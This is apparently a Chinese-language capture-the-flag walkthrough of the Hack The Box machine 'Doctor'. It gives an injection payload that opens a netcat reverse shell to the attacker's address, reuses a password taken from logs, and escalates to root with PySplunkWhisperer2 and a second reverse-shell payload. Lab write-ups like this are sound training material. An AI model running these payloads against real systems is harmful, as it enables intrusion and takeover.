HTB Doctor

HTB Doctor(Easy)

地址:https://www.hackthebox.eu/home/machines/profile/278
基本信息
HTB Doctor_第1张图片在进行渗透之前需要将HTB与kali进行连接,建立连接之后才可以进行渗透
HTB Doctor_第2张图片

一、信息收集

HTB Doctor_第3张图片靶机地址为10.10.10.209
使用nmap对靶机进行扫描

nmap -sC -sV -sT -O -A 10.10.10.209

开放了22,80,8089三个端口
8089对应的服务为splunk
HTB Doctor_第4张图片

二、访问80端口

需要添加一条hosts命令才可以访问其他内容
HTB Doctor_第5张图片

三、访问doctors.htb

vim hosts
10.10.10.209 doctors.htb

HTB Doctor_第6张图片进入页面后尝试万能登陆密码,但是失败了

HTB Doctor_第7张图片
注册用户进行登录看看是否有可利用的信息,发现可能存在xss漏洞,可以构造xss代码反弹shell

<img src=http://10.10.14.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.3'$IFS'1234')>

HTB Doctor_第8张图片成功反弹,获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

进入home目录查看是否有可利用信息
在shaun目录下发现user.txt
在这里插入图片描述尝试查看,但是没有权限被拒绝
HTB Doctor_第9张图片通过其他途径进行权限的提升,最终在/var/log/apache2路径下发现backup文件
HTB Doctor_第10张图片

查看backup是否能够获得有用信息
筛选含有密码的记录

cat backup | grep password

在这里插入图片描述
切换shaun用户登录,查看user.txt但是这不是最终要获取的内容
需要提权到root权限才可以获得
HTB Doctor_第11张图片

四、提权

利用8089对应的服务为splunk进行提权

git clone https://github.com/cnotin/SplunkWhisperer2.git 复制到/htb/doctor文件夹下
cd SplunkWhisperer2/ 进入SplunkWhisperer2文件 
cd PySplunkWhisperer2/ 进入PySplunkWhisperer2文件 
chmod 777 PySplunkWhisperer2_remote.py 提权

在这里插入图片描述
HTB Doctor_第12张图片通过github中的使用方法进行操作
HTB Doctor_第13张图片

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.3 --username shaun --password Guitar123 --payload " "nc.traditional -e /bin/bash '10.10.14.3' '8888'"

HTB Doctor_第14张图片
HTB Doctor_第15张图片进入root目录获取root.txt
HTB Doctor_第16张图片

你可能感兴趣的:(Hack,The,Box)